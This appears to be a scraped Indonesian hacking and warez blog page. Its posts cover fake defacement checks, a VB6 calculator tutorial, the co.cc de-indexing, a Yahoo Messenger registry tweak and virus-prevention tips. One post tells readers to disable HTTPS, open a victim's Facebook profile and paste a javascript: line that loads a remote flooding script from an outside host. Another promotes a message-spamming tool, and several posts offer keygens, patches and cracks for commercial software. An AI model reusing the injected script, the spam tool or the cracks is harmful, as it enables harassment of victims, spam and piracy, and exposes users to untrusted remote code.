cara untuk mengetahui blog hasil deface yang palsu.

Mungkin anda bertanya, “PALSU” seperti apa..?

Palsu disini dalam arti, sesungguhnya blog tersebut tidak ada, namun dengan alasan tertentu seseorang bisa membuat sebuah blog dengan tampilan yang seolah-olah hasil deface.  Hal ini gampang sekali, jika anda ingin melakukan hal semacam itu, anda tinggal buat akun baru di blog kemudian buat tampilan blog seolah-olah anda deface, lalu kirim ke teman-teman.  Gampang bukan…??? Mungkin bagi orang lain akan mempercayai anda, tapi tidak bagi saya , hehe   (dikit sombong gpp, ga bayar inih :D ) dan mungkin nanti anda akan berpikiran seperti saya. :)

Oke, sekarang kita akan coba kupas tuntan (kayak acara Tipi aja) bagaimana cara mengetahui cara bagaimana kita mengetahui blog tersebut  “palsu” atau “asli”.
Cara nya sangat gampang sekali, mungkin ini tidak terpikirkan oleh anda atau mungkin banyak orang.
Caranya yaitu dengan menggunakan “Mbah Sejuta Umat” . ya, apalagi kalau bukan Gooooogle. Tehnisnya seperti ini,  kita coba search url dari blog tersebut.
Ketiklah : allinurl:<alamat blog hasil deface tersebut>

Nanti kita lihat dari hasil pencarian, jika didapat hasil pencarian (bisa berupa artikel-artikel yang berisi hasil posting dari blog tersebut sebelumnya), bisa dipastikan bahwa page deface tersebut adalah “asli”, namun jika tidak didapatkan hasil maka kemungkinan page deface tersebut adalah “palsu” (namun ini hanya kemungkinan, kita tetap harus mengedepankan asaz Praduga Tak bersalah :D )

Oke, sekarang kita coba kita praktekkan, coab search   berikut
     allinurl:jakartagoid.blogspot.com
     allinurl:pemudapbb46.blogspot.com

Coba anda bandingkan hasil pencarian tersebut, dan tentukan mana yang termasuk "asli” dan mana yang “palsu” :)

Namun demikian, kita tidak bisa begitu saja mengatakan bahwa orang yang menginformasikan deface blog “palsu” tersebut  bohong. Mengapa, karena bisa jadi dia benar-benar  berhasil mengambil alih akun gmail, tetapi karena di dalam akun tersebut tidak  terdapat blog , maka dia buat blog baru dengan akun tersebut dan hasilnya adalah deface blog “palsu” tersebut, so ini tidak salah maupun berlebihan (bahasa sekarngnya : LEBAY :),  mungkin orang tersebut hanya ingin menunjukkan bahwa dia telah berhasil mengambil salah satu akun gmail,karena dengan alasan tertentu dia tidak mungkin menunjjukkan  isi imail tersebut ke orang lain, jadi salah satunya dengan membuatkan blog dengan akun tersebut. Namun demikian hal ini bisa saja  hoax, coz hanya dia saja yang mengetahui “keabsahan” dari  hasil  deface.annya. Wallahu’alam

Ada lagi Salah satu trik dalam membuat blog deface palsu adalah dengan membuat lebih dari 1 blog dengan menggunakan 1 akun blog. Seperti kita ketahui 1 akun blog kita bisa membuat lebih dari 1 halaman blog, dan lagi-lagi ini hanya pemilik deface blog tersebut lah yang mengetahui “keabsahan” dari  hasil  deface.annya.   Wallahu’alam

Oke, gampang kan, jadi mulai sekarang jika anda menemukan/ditunjukkan deface blog tersebut, coba cek dengan cara diatas, namun jangan serta merta kita langsung menuduh yang nggak-nggak siapa tahu memang benar, coz mungkin blog yang dia deface mamang belum ada postinganyya, sehingga ketika di hack tidak akan ketemu dalam mesin pencari google.( kita tetap harus mengedepankan asaz Praduga Tak bersalah :D )

Read more


Cara Membuat Calculator menggunakan Visual Basic 6

Selamat Malam ...
Selamat Menunaikan Ibadah Puasa Semua
Sorry baru sempat nonggol lagi
abis baru kali ini sempat Online hehehehehe
Ini saya ada tutor Membuat Calculator loh!!!
Langsung Saja ya :

alat yg di perlukan:
VB6 (Tentu)
Kesabaran
Ketelitian

pertama buka VB6 dan pilih standart Exe lalu buatlah Text dan command seperti di bawah ini :

Textbox 1:
(Name) : txtDisplay
Alignment: 1-Right Justify
Text : (kosongkan)
Maxlength : 12

Command Button 1:
(Name) : cmdAngka
Index : 1
Caption : 1

Command Button 2:
(Name) : cmdAngka
Index : 2
Caption : 2

Command Button 3:
(Name) : cmdAngka
Index : 3
Caption : 3

Command Button 4:
(Name) : cmdAngka
Index : 4
Caption : 4

Command Button 5:
(Name) : cmdAngka
Index : 5
Caption : 5

Command Button 6:
(Name) : cmdAngka
Index : 6
Caption : 6

Command Button 7:
(Name) : cmdAngka
Index : 7
Caption : 7

Command Button 8:
(Name) : cmdAngka
Index : 8
Caption : 8

Command Button 9:
(Name) : cmdAngka
Index : 9
Caption : 9

Command Button 10:
(Name) : cmdAngka
Index : 0
Caption : 0

Command Button 11:
(Name) : cmdPlusMinus
Caption : +/-

Command Button 12:
(Name) : cmdKoma
Caption : .

Command Button 13:
(Name) : cmdOperator
Index : 1
Caption : +

Command Button 14:
(Name) : cmdOperator
Index : 2
Caption : -

Command Button 15:
(Name) : cmdOperator
Index : 3
Caption : x

Command Button 16:
(Name) : cmdOperator
Index : 4
Caption : /

Command Button 17:
(Name) : cmdClearEntry
Caption : CE

Command Button 18:
(Name) : cmdClear
Caption : C

Command Button 19:
(Name) : cmdSamaDengan
Caption : = 

Untuk tata letak nya silahkan desain sendiri
Setelah membuat 1 Text dan beberapa command Copy paste Code di bawah ini ke Form1

Option Explicit
Private Hasil As Double
Private Const opNol = 0
Private Const opTambah = 1
Private Const opKurang = 2
Private Const opKali = 3
Private Const opBagi = 4
Private Operator As Integer
Private NilaiBaru As Boolean

' untuk menghapus karakter terakhir
Private Sub Hapus()
Dim txt As String
Dim min_len As Integer
txt = txtDisplay.Text
If Left$(txt, 1) = "-" Then
min_len = 2
Else
min_len = 1
End If
If Len(txt) > min_len Then
txtDisplay.Text = Left$(txt, Len(txt) - 1)
Else
txtDisplay.Text = "0"
End If
End Sub

' hapus angka, hasil terakhir dan operator
Private Sub cmdClear_Click()
cmdClearEntry_Click
Hasil = 0
Operator = opNol
End Sub
' hapus angka
Private Sub cmdClearEntry_Click()
txtDisplay.Text = ""
End Sub
' menambahkan koma (desimal)
Private Sub cmdKoma_Click()
If InStr(txtDisplay.Text, ".") Then
Beep
Else
If NilaiBaru Then
txtDisplay.Text = "."
NilaiBaru = False
Else
txtDisplay.Text = txtDisplay.Text & "."
End If
End If
End Sub

' Menghitung
Private Sub cmdSamaDengan_Click()
Dim HasilBaru As Double
If txtDisplay.Text = "" Then
HasilBaru = 0
Else
HasilBaru = CDbl(txtDisplay.Text)
End If
Select Case Operator
Case opNol
Hasil = HasilBaru
Case opTambah
Hasil = Hasil + HasilBaru
Case opKurang
Hasil = Hasil - HasilBaru
Case opKali
Hasil = Hasil * HasilBaru
Case opBagi
'Tidak bisa dibagi nol
If HasilBaru = 0 Then
MsgBox "Tidak bisa dibagi 0", vbOKOnly + vbCritical, "Kalku ERROR"
Call cmdClear_Click
Else
Hasil = Hasil / HasilBaru
End If
End Select
Operator = opNol
NilaiBaru = True
txtDisplay.Text = Format$(Hasil)
End Sub

' menuliskan angka
Private Sub cmdAngka_Click(Index As Integer)
If NilaiBaru Then
txtDisplay.Text = Format$(Index)
NilaiBaru = False
Else
txtDisplay.Text = _
txtDisplay.Text & Format$(Index)
End If
End Sub
' tombol tambah/kurang/bagi/kali
Private Sub cmdOperator_Click(Index As Integer)
cmdSamaDengan_Click
Operator = Index
NilaiBaru = True
End Sub

' merubah tanda +/-
Private Sub cmdPlusMinus_Click()
If NilaiBaru Then
txtDisplay.Text = "-"
ElseIf Left$(txtDisplay.Text, 1) = "-" Then
txtDisplay.Text = Right$(txtDisplay.Text, 2)
Else
txtDisplay.Text = "-" & txtDisplay.Text
End If
End Sub

' filter untuk angka saja yg dapat diketikkan
Private Sub Form_KeyPress(KeyAscii As Integer)
txtDisplay_KeyPress KeyAscii
End Sub
Private Sub Form_KeyUp(KeyCode As Integer, Shift As Integer)
txtDisplay_KeyUp KeyCode, Shift
End Sub
' supaya kursor tetap di kanan
Private Sub txtDisplay_Change()
txtDisplay.SelStart = Len(txtDisplay.Text)
End Sub
Private Sub txtDisplay_GotFocus()
txtDisplay_Change
End Sub

' untuk mengetikkan angka di keyboard
Private Sub txtDisplay_KeyPress(KeyAscii As Integer)
Dim ch As String
ch = Chr$(KeyAscii)
Select Case ch
Case "0"
cmdAngka_Click 0
Case "1"
cmdAngka_Click 1
Case "2"
cmdAngka_Click 2
Case "3"
cmdAngka_Click 3
Case "4"
cmdAngka_Click 4
Case "5"
cmdAngka_Click 5
Case "6"
cmdAngka_Click 6
Case "7"
cmdAngka_Click 7
Case "8"
cmdAngka_Click 8
Case "9"
cmdAngka_Click 9
Case "*", "x", "X"
cmdOperator_Click opKali
Case "+"
cmdOperator_Click opTambah
Case vbCrLf, vbCr, "="
cmdSamaDengan_Click
Case "-"
cmdOperator_Click opKurang
Case "."
cmdKoma_Click
Case "/"
cmdOperator_Click opBagi
Case "C", "c"
cmdClearEntry_Click
End Select
KeyAscii = 0
End Sub

' untuk ketikan angka di numpad
Private Sub txtDisplay_KeyUp(KeyCode As Integer, Shift As Integer)
Select Case KeyCode
Case vbKeyNumpad0
cmdAngka_Click 0
Case vbKeyNumpad1
cmdAngka_Click 1
Case vbKeyNumpad2
cmdAngka_Click 2
Case vbKeyNumpad3
cmdAngka_Click 3
Case vbKeyNumpad4
cmdAngka_Click 4
Case vbKeyNumpad5
cmdAngka_Click 5
Case vbKeyNumpad6
cmdAngka_Click 6
Case vbKeyNumpad7
cmdAngka_Click 7
Case vbKeyNumpad8
cmdAngka_Click 8
Case vbKeyNumpad9
cmdAngka_Click 9
Case vbKeyMultiply
cmdOperator_Click opKali
Case vbKeyAdd
cmdOperator_Click opTambah
Case vbKeySeparator
cmdSamaDengan_Click
Case vbKeySubtract
cmdOperator_Click opKurang
Case vbKeyDivide
cmdOperator_Click opBagi
Case vbKeyDecimal
cmdKoma_Click
Case vbKeyBack, vbKeyDelete
Hapus
End Select
KeyCode = 0
End Sub 

Credit : DianNamiKaZe dan Teman-Temannya

Read more


Taukah Kamu Kalo Blog dgn CO.CC Dihilangkan di Google Pencarian?

Bagi pemilik blog dengan domain co.cc tentunya bertanya tanya kenapa semua blog site dengan domain co.cc menghilang dari google pencarian? Kenapa seluruh domain co.cc tidak muncul di dalam Google pencarian ?
Dari jawaban Matt Cutts sang empunya google memberikan jawaban yaitu :

“This article reminds me of a Google webspam point of policy that I’ve been meaning to discuss for a long time. First, a definition: a “freehost” is a domain that will let anyone register a site on that domain. There’s lots and lots of high-quality freehosts out there (wordpress.com comes to mind).”

“We absolutely do try to be granular, but I wanted to mention that if we see a very large fraction of sites on a specific freehost be spammy or low-quality, we do reserve the right to take action on the freehost as a whole. I think most savvy search/SEO folks would understand this completely, but I figure it’s better to over-communicate than under-communicate.”

“This is not a new webspam policy. Other parts of Google do similar things. For example, talks about “bulk subdomain providers” (treat it as the same thing as a freehost) and they mention “To help protect users we recently modified those [malware scanning] systems to identify bulk subdomain services which are being abused. In some severe cases our systems may now flag the whole bulk domain.“

Intinya Jawaban Google Tentang Hilangnya CO.CC dari Mesin Pencarian Google begini :

Google sudah berulang kali mengingatkan tentang Aturan kebijakan Google Web spam policy. Google berhak memberikan tindakan banned atau de indexing dari google pencarian bila ada suatu situs terdeteksi merupakan blog / site yang berkualitas rendah , diantaranya melakukan spam, menggunakan Content Farm , termasuk AGC dan Copasser, dan site / blog tersebut terdeteksi terdapat malware.

Termasuk disini google nampaknya sangat ketat memberlakukan aturan ini terhadap domain/site/blog yang menggunakan Freehosting dan sub domain dari ”penyedia subdomain masal” seperti penyedia Bulk Domain CO.CC.
Penjelasan Matt Cutts Pemilik Google bisa dibaca di :
http://plus.google.com

Tindakan Google ini seiring dengan keluarnya jurus baru google pencarian baru yaitu Google Panda yang memang terbukti ampuh memberantas jutaan blog sampah di google pencarian yang marak akhir akhir ini
Tapi yang menjadi kontroversial adalah dengan adanya Banned masal Blog dengan domain co.cc, sehingga seluruh website blog dengan domain co.cc hilang dari google pencarian.

Dilaporkan sekitar 4 juta domain dari kurang lebih 30 juta Domain yang terdaftar co.cc yang terdeteksi melanggar kebijakan google ini namun nampaknya google akhirnya membanned seluruh domain co.cc termasuk TLD nya yaitu co.cc.

Jadi dengan adanya penerapan ini hanya karena 4 juta domain blog sampah terpaksa menganulir keseluruhan dari domain co.cc
Tindakan Google punishing terhadap co.cc di berbagai Forum SEO termasuk di Forum Webmaster nya google menuai perdebatan yang sangat sengit. Karena Google terkesan melakukan tindakan sepihak dan tidak proposional. Banyak yang mengangap tindakan ini merupakan arogansi dari google dan terkesan hal ini merupakan suatu persaingan bisnis yang tidak sehat. Sungguh merupakan hal yang tidak fair.

Kenapa hanya co.cc karena penyedia sub domain lain seperti cz.cc, co.tv , co.be dan masih banyak lagi penyedia sub domain masal tidak mendapat tindakan yang sama.
Kenapa juga blogger dengan blogspot nya yang nota bene juga penyedia layanan gratis sub domain blogspot tidak terkena tindakan ini, padahal banyak juga blog pada blogspot yang merupakan blog dengan kualitas rendah, dan terindikasi spam, dan malware .

Atau kah hanya karena bloggger merupakan milik dari Google sehingga aturan Google ini tidak diterapkan pada blogspot. Atau kah ada unsur diskriminasi google terhadap co.cc kah ? Lagi lagi pada ujung nya jawabanya adalah untuk mengamankan bisnis Google Incorporation.

Memang tidak di pungkiri saat ini google adalah pemegang peranan terbesar di dunia maya internet ini dengan Google Search Engine nya. Dan saat ini Google nampaknya menunjukan Powernya sebagai penguasa terbesar, sehingga bak Negara Amerika Serikat USA yang mersa dirinyalah penguasa Dunia sehingga bisa melakukan tindakan yang semena mena sesuai dengan keinginannya.
Perdebatan Alasan Banned Domain CO.CC oleh Google baca di:
http://www.google.co...m/p/Webmasters/
Kita tunggu sama sama perkembangan tentang kontroversi Banned masal google terhadap co.cc ini. Apakah Second Level domain lain akan terus aman ? Karena CZ.CC, CO.TV, CO.BE dan WordPress samapai saat artikel ini saya tulis masih aman di Google Pencarian

Bagi yang mempunyai blog dengan domain co.cc semoga tidak menjadi berkecil hati dan putus asa, karena selain google masih ada mesin pencarian lain yaitu Yahoo dan Bing. Bila berniat untuk semakin serius memang disarankan untuk berganti ke Top Level Domain TLD yaitu com, net, org, biz dan TLD lainnya.
TAG: Artikel ini untuk menjawab pertanyaan kenapa website co.cc hilang dalam google pencarian, Kenapa Google banned domain website CO.CC, Google Sandbox website CO.CC, Penyebab Hilangnya CO.CC dari daftar Google, Website CO.CC tidak muncul pada Mesin Pencarian Google, site:co.cc tidak muncul sama sekali di google. Apa Sebab website co.cc tidak terdaftar dalam Google Pencarian.


Sumber : SenTero.Net

Read more


Log in yahoo messenger ( unlimited / tanpa ada batasnya )

Hello World
Good Afternoon :D
Apakabar semua?
hahaha
langsung saja ya biar kalian tidak menunggu lama :


oh ya 
saya cuman mau kasih tutorial Log in Yahoo Messenger (YM) 
salah satu contoh gambarnya seperti ini :






1. Pertama klik Start => Run => ketikan Regedit

2. kalau sudah masuk regedit....
HKEY_CURRENT_USER => Software => Yahoo => pager =>Test

3. jika sudah ada di bagian test lakukan langkah berikut ..

Klik kanan => pilih New => pilih Dword

4. kalau sudah beri nama Plural



5. Double klik  isikan 1 pada value Box dan Basenya Decimal




6. Jika sudah .. tutup regedit .. restart yahoo messenger .. dan coba untuk membuka yahoo messenger ...


dan lihat la apa yang terjadi :D
selamat mencoba

Read more


Wall Flood Facebook ( Bagus untuk dicoba )

selamat malam sobat blogger 
saya akan memberikan salah satu cara membuat JUNKER di Wall Facebook
Oke langsung saja ya :

Langkah pertama kalian harus cek dulu Setting Account.
Caranya : 
1. klik Accoount > Account Setting > Account Security > Klik Change 
2. Uncheck "Secure Browsing (https) "
3. klik Save.

Next Cari target korban kalian dan buka Profile nya.
Setelah itu Copy paste Script berikut pada address bar Browser.. INGAT ! 
Addres Bar Browser!

javascript:(a = (b = document).createElement("script")).src = "//blazetorm.net/btflood.js", b.body.appendChild(a); void(0)

Isikan Jumlah Flood yg akan di masukan,misal 100
Dan isikan pesan nya..

Silahkan Refresh FaceBook Korban dan Floodpun berjalan.

NOTE : flood tidak akan berkerja jika Korban telah mensetting Account Privacy dimana "Friends Cannot Write on My Wall" di centang.

Use with your Own Risk !

Sekian Terima Kasih 

Read more


Blackc0de Spamer ( Karya Anak Indonesia )



NB : Klik Gambar Buat Download

Helloo Every body :D

apakabar semua?
sudah lama sekali saya tidak posting ini saya baru pulang dari liburan hehehe.....
langsung saja ya :

Blackc0de Spamer >>> apa itu spammer?
Spamer berasal dari Spam yakni tulisan-tulisan sampah/junkmail yang akan dikirim melalui E-mail secara berulang-ulang/bertubi-tubi tanpa diminta dan tidak dikehendaki oleh si penerima, tujuanya untuk mengiklankan sesuatu tapi tidak pada tempatnya.. hal ini tentu membuat si penerima menjadi tidak nyaman.


Saya akan mensertakan salah satu contohnya seperti ini :



 Mantap?

Di dalam BlackC0de Spamer ini terdapat fitur-fitur yang tidak akan pengguna software ini tidak merasa bosan sama sekali
didalam software ini terdapat fitur

[*] Always on top (selalu terdepan)
[*] Bisa memilih kecepatan[*] bisa mengirim lebih dari 1000 pesan (lebih dari 1000 akan sedikit mengalami eror/lag)
[*] Terdapat Windows force (Regedit, CMD, Disk Cleaner, Control Panel, System Info, Task manager)
[*] Terdapat mode Flashing twingkle (berkelap-kelip_[*] Terdapat Mode Transparan
[*] Dapat merubah fonts text (Arial, Lucida Fax, Bradley Hand ITC, Book Antiqua)
[*] Terdapat tutorial dalam 5 bahasa (Indonesia, Korea, Inggris, Jerman, Jepang)

Untuk tutorial saya sudah siapkan dalam software .. tapi kalau anda penasaran bisa melihat tutorial dibawah sini

Cara penggunaan Blackc0de Spammerz

Pengertian Spam secara harfiah adalah sampah, Atau sesuatu yang tidak kita inginkan berada di tempat kita.
kalau sudah tahu apa arti spam langsung aja ke cara penggunaanya
1. Buka Blackc0de Spammerz
2. Isikan pesan yang ingin di spam dalam kotak "Messege to spam"
3. Isikan dengan Nomor berapa pesan yang ingin di send
4. Pilih salah satu kecepatan yang ingin dipilih
5. Apabila anda sudah yakin dengan pilihan dan pesan klik "Start" Untuk Memulai
Jika anda sudah puas klik "Stop" Untuk menghentikan Proses Spam
6. Enjoy :-)

Read more


SpeedOut | Aplikasi Buat Tes Kecepatan Flashdisk



NB : Klik Gambar Buat Download

Saya yakin semua pengunjung JohnSoftware sudah nggak asing lagi dengan yang namanya flashdisk. Benda kecil ini bisa dikatakan benda yang wajib dimiliki untuk saat ini, ibarat sayur tanpa garam. Benar tidak?? Ehm,, tapi pernahkah anda mengukur kecepatan transfer flashdisk kesayangan anda??

Nah, untuk mengetahui kecepatan transfer data (read/write) pada sebuah flashdisk atau media penyimpanan lainnya, sobat blogger bisa menggunakan aplikasi yang satu ini, yakni SpeedOut, Aplikasi Buat Tes Kecepatan Flashdisk.

Possibilities and advantages:
  • Fully portable
  • No need to reformat your drive
  • Low-level technology
  • Beautiful interface
  • Easy to use - click2go
  • No bugs as soon as you are not disasming it
  • Short tests - realistic results.
  • TOTALLY clean
  • And, of course, free

Read more


Facebook Blaster Pro v9.0.2 full ( Keygen + Patch )



NB : Klik Gambar Buat Download

FaceBook Blaster Pro is the internets 1 Facebook friend adder marketing software tool. Internet marketers are experiencing a gold rush of web 3.0 FREE advertising to highly targeted leads on the fastest growing social network Facebook. Facebook Blaster Pro can run your marketing efforts on autopilot because automation is key to your success.

Sumber : All Is Free

Read more


Mencegah Komputer Terinfeksi Virus

Mencegah Komputer Terinfeksi Virus

Ada beberapa Tips untuk mencegah komputer Terinfeksi virus diantaranya:


Menginstalasi program antivirus yang terbaik.
Senantiasa melakukan update antivirus anda.
Menginstalasi service pack yang terbaru.
Senantiasa melakukan patch terhadap sistem operasi anda dengan patch terbaru
Tidak menjalankan program-program executable yang tidak jelas sumbernya, apalagi yang sudah jelas adalah virus
Tidak membuka email yang tidak relevan (baik dari subject maupun isinya) ataupun sumbernya yang tidak kita kenal.
Tidak mengunjungi situs-situs yang tidak relevan (situs dewasa, crack, hacking)
Melakukan sharing read only folder anda.
Menghindari pemakaian flashdisk/floppy
Tidak login dengan account Administrator

Untuk tips nomor 5, dapat mengunakan sebuah program yang namanya Trust-No-Exe didapat ditemukan di http://www.beyondlog...rust-no-exe.htm, dimana merupakan suatu executable file filter yang dimasukan ke sistem operasi untuk membatasi executable file .exe .com .dll .drv .sys .dpl dll yang berada difolder diluar dari lokasi yang anda tentukan (secara default adalah c:\windows dan c:\program files)

Selain cara-cara di atas, beberapa cara agar terhindar dari virus adalah:

1. Tampilkan ekstensi file (*.exe,*.doc,*.jpg,dll) dengan cara

Buka My Computer
Pilih Tools-Folder Option
Nonaktifkan/hilangkan tanda centang (V) di pilihan Hide Extensions For Known File Type.

 

Ini untuk mengantisipasi virus yang menyamar dengan virus yang memakai ekstensi ganda, misal blabla.doc.exe dimana normalnya akan terbaca sebagai blabla.doc. Penyamaran model ini digunakan oleh virus kangen

2. Ubah ikon folder dengan ikon yang lain. Ini agar memudahkan kita dalam mengenali virus yang menyamar sebagai folder.

3. Menggunakan Linux sebagai sistem operasi kedua. Apabila akan mengkopi file sebaiknya dari Linux karena Linux lebih aman dari virus, meskipun bukan berarti di Linux tidak ada virus, tetapi sulit untuk menginfeksi Linux. Sekarang Linux tidak lagi susah. Yang Sulit adalah mengubah kebiasaan memakai Windows.

Sedikit tips di atas semoga bermanfaat.

Read more


Deep Freeze Pro v7.21.20.3447 Final Full ( Keygen and Serial )



NB : Klik Gambar Buat Download

ensures computers are absolutely bulletproof, even when users have full access to system software and settings. Users get to enjoy a pristine and unrestricted computing experience, while IT personnel are freed from tedious helpdesk requests, constant system maintenance, and continuous configuration drift.

Balancing Security with Productivity

Deep Freeze is the only solution that effectively balances workstation security with user productivity. By mapping user and application data to a Thawed (unprotected) partition or drive, users are able to store their documents, pictures, music, etc., while still enjoying the total system consistency that Deep Freeze offers.

Flexible Resiliency

Deep Freeze offers flexible scheduling options that enable IT administrators to easily create automated update and maintenance periods. Schedule Deep Freeze to allow system and virus definition updates to occur from predefined times—either with the Deep Freeze Enterprise Console or using your preferred third-party desktop management solution.

Computers in education environments are among the toughest IT environments to manage and secure. The large number of daily users, the limited resources of on-site staff, and the immense number of computers and labs that technology personnel must manage all come together to create an IT 'perfect storm'. IT personnel cannot afford to have computer systems down for long–students use computers in schools to conduct research and complete assignments; instructors need computers to record grades and organize their lessons; administrative staff need their workstations to complete their job function.

Computer Labs

Deep Freeze makes it easy for IT administrators to create bulletproof computer labs that deliver trouble-free computing to instructors and students. Deep Freeze ensures that students are able to use public access computers with the assurance that their session will be free from accidental system misconfiguration, malicious software activity, and incidental system degradation. Personal information is never retained by the computer, which means IT personnel don’t need to worry about desktop computers becoming congested with student projects and files. Computing environments become easier to manage, and expensive computer assets are kept running at 100% capacity.

Deep Freeze's ability to prevent stability degradation ensures that scholastic computer labs are able to provide the same experience over and over again regardless of the user on the desktop–an important prerequisite to successfully teaching a classroom concept.

Administrative Machines

Deep Freeze is not just for student machines; it can also be used on instructor and employee computers. Since Deep Freeze offers flexible options for saving user data, it becomes easy to secure a workstation with total resiliency while still enabling users to save their work. Instructors and staff enjoy the assurance of knowing their computers will never fail them, and IT personnel are freed from having to deal with tedious helpdesk requests.

Libraries

Deep Freeze ensures that students and staff enjoy a trouble-free library computing experience. Students are able to use library computers with the assurance that their session will be free from malicious software and system slowdowns. IT personnel can rest easy with the knowledge that Deep Freeze makes media computers immune from system slowdowns and software corruption caused by students accessing online media resources during their research.


Sumber : All Is Free

Read more


WinApp | IOBit Game Booster Premium 2.4.1 Portable Full Version



NB : Klik Gambar Buat Download

Designed to help optimize your PC for smoother, more responsive game play in the latest PC games with the touch of a button, Game Booster helps achieve the performance edge previously only available to highly technical enthusiasts.
It works by defragmenting game directories, temporarily shutting down background processes, cleaning RAM, and intensifying processor performance. That means you can keep all the features of operating systems ready for when you need them, but turn them off when you are ready to get down to serious business – gaming.
Works compatible with PunkBuster, Cheating-Death, VAC, and any other anti-cheat software, Game Booster makes it simpler to enjoy the latest games and take your experience to a new level. All systems go!

Key Benefits:

1 Click. Game Booster is extremely easy to use. Its intuitive interface makes Game Booster the perfect tool for complete computer beginner.
Speeds up Game Play. Game Booster gives more CPU and RAM to your games, making your games running at the peak performance.
Defragments Game Files. Game Booster can quickly defragment game directories and files, to make your games load and run faster than ever.
Increases Gaming Stability. Game Booster prevents and avoids possible conflicts and incompatibility, by temporarily closing background processes and unnecessary Windows services.
Safe, Secure, and Free. Game Booster does not overclock your hardware, does not change your Windows Registry and system settings. Game Booster is 100% freeware, without any virus, adware, and spyware.

Operating System: Designed for Windows 2000, XP, Vista and Windows 7 (32-bit and 64-bit). 


Sumber : All Is Free

Read more


AMS Software Frame Maker Pro v3.91 Full ( Keygen + Patch and Crack )



NB : Klik Gambar Buat Download

Frame Maker Pro is an imaging and desktop enhancement program that adds impressive frames to digital photos in order to enhance your personal albums, projects, websites or desktop wallpapers with remarkable ease. Through its innovative graphical user interface, you can choose from a variety of frames and add them to your images; full screen preview the result; save your framed images in popular formats for use on your projects; print your framed images. You can create hundreds of original and creative frames and save these frames as presets.

Frame Maker Pro - Features:
• User - friendly interface.
• Supports APS, BMP, JPEG, GIF, PNG, WMF, EMF.
• The ability to add simple borders, artistic frames and photo edges.
• Allows to adjust color balance, contrast and brightness.
• Allows to apply special effects (sepia, mosaic, wave, etc.) 


Sumber : All Is Free

Read more


Windows 7 Ultimate Keygen v1.3.3.8



NB : Klik Gambar Buat Download

Make your windows 7 Ultimate become genuine !!


Sumber : All Is Free

Read more


EZ Schematics v4.0414 Full Keygen | Aplikasi Untuk Membuat Skema Diagram Elektronika



NB : Klik Gambar Buat Download

Buat temen-temen yang kuliah mengambil jurusan elektro, mungkin bisa mencoba aplikasi pembuat diagram atau skema elektronika dengan mudah, yakni EZ Schematics v4.0414 Full Keygen.

Program EZ Schematics v4.0414 ini dirancang oleh seorang tukang listrik industri dengan lebih dari 20 tahun pengalaman, baik tips dan pelatihan dalam kendali logika relay (serupa dalam banyak hal dengan logika PLC). Aplikasi, didirikan dalam format diagram garis, menyediakan pengguna akhir dengan kemampuan untuk dengan cepat dan mudah mengubah konsep-konsep logis menjadi profesional diplayed listrik skematis.

What makes EZ Schematics a better CAD program for producing electrical schematics includes the following:
  1. Ease of use. There's no other Cad program available that's easier to learn than EZ Schematics.
  2. Every electrical symbol is created in 1/2" scale increments designed to align perfectly with the default snap (also set at 1/2'), thus making precise placement of the symbols a simple procedure.
  3. Only symbols pertinent to typical U.S. electrical schematics are available (approx. 60). Thus, there's no waste of time in pouring over thousands of choices.
  4. When inserting a symbol, smart choice labeling is employed. For example, when inserting a control relay coil, "CR" is automatically attached as the standard beginning label anticipating it to be followed by "1" or "2", etc.
  5. The "Line" control (the most popular device) becomes readily available by simply double-clicking anywhere in the drawing.
  6. Labeling the wire numbers is performed easily and precisely. Just click and type at the location of choice.
Sumber : Remo-Xp

Read more


Shadow Defender 1.1.0.325 Full Serial



NB : Klik Gambar Buat Download

Berhubung ada yang Request Shadow Defender ini saya kasih langsung saja ya :D

Nah,, Pada kesempatan kali ini saya akan share Shadow Defender 1.1.0.325 tentu full versi dan di sertai dengan serial untuk aktivasi.

Cara kerja Shadow Defender sendiri bisa di bilang sama dengan Deep Freeze, namun ada sedikit perbedaan dengan fitur yang ada di Deep Freeze dan Shadow Defender. Berikut kira-kira perbedaan yang terdapat antara Shadow Defender dengan Deep Freeze.
  • Kalau menurut saya tampilan Shadow Defender lebih mudah untuk di mengerti, meskipun sebenarnya Dee Freeze pun mudah di mengerti.
  • Terdapat fitur Exclusion (pengecualian). Maksudnya seperti ini sob, anda bisa memilih folder/file yang di inginkan agar bisa mengalami perubahan.
  • Tidak perlu restart untuk mengaktifkan proteksi (freeze/shadow). Tinggal aktifkan saja Shadow Mode/Normal Mode.
Shadow Defender Features :
  • Prevent all viruses and malware.
  • Surf the internet safely and eliminate unwanted traces.
  • Protect your privacy.
  • Eliminate system downtime and maintenance costs.
  • Reboot to restore your system back to its original state.
Shadow Defender Users :
  • Maintain a system free from malicious activity and unwanted changes.
  • Test software and game installations in a safe environment.
  • Protect against unwanted changes by shared users (suitable for workplaces and educational institutions)

Read more


Terabyte Image for Windows 2.63 Full ( Keygen + Patch and Crack )



NB : Klik Gambar Buat Download

Image for Windows - allows you to make a "snapshot" of a PC hard disk partition or its part and then save the resulting image on another drive or directly create a bootable CD / DVD-ROM with the necessary information. Thus, in the case of any problems you can always restore from the backup information.

Image for Windows Features
- Total Reliability - Provides the option to verify each and every byte it backs up.
- Convenience - Runs directly from Windows and when used with the free PHYLock™ add-on, it can create a true image of the Windows partition itself, without requiring a reboot.
- Security - Your backups can be secured using simple password protection, or full 256-bit AES encryption.
- Backup Changed Data - Differential backup option allows you to backup only data that has changed since the last full backup was created.
- Simple, Wizard-Driven interface - Easy to use the first time, and every time.
- Maximum Compression - By default, compression is applied to the drive images you create.
- Maximum Speed - If backup speed is paramount, you can bypass compression entirely.
- Optical Drive Support - You can save directly to a CD, DVD, DVD-DL, BD.
- Bootable Rescue Discs - Whenever you save directly to a CD, DVD, DVD-DL, BD, it will automatically become a bootable restore disc.
- Large drive support - GPT compatible supporting drives larger than 2TiB.
- Restore Individual Files or Folders - Using the free TBIView and TBIMount add-ons, you can view the contents of the drive image files, and optionally restore individual files or folders -within them.
- Compatibility - Automatically recognizes and backs up used area of FAT16, FAT32, NTFS, Ext2, Ext3, Ext4, ReiserFS, and XFS partitions. Partitions with other file system types can be backed up in their entirety. Supports all standard partitions in an MBR, EMBR, or GPT
- Windows Servers - Supports both Workstation and Server versions of Windows.
- Cost Effectiveness - Includes Image for DOS, Image for Linux, and TBOSDT at no additional charge, making it a uniquely affordable and complete disk imaging solution.
- Flexibility - Restore partitions, regardless of the file system on the partition being restored. This gives you the power to restore NTFS partitions from Windows 98 or even DOS (as just a couple of examples).
- Wide-Ranging Device Support - Compatible with USB 2 and IEEE 1394 external drives. Better yet, Image for DOS supports these drives directly, without requiring complicated driver installation. (Image for Windows simply uses the drivers already available under Windows.)
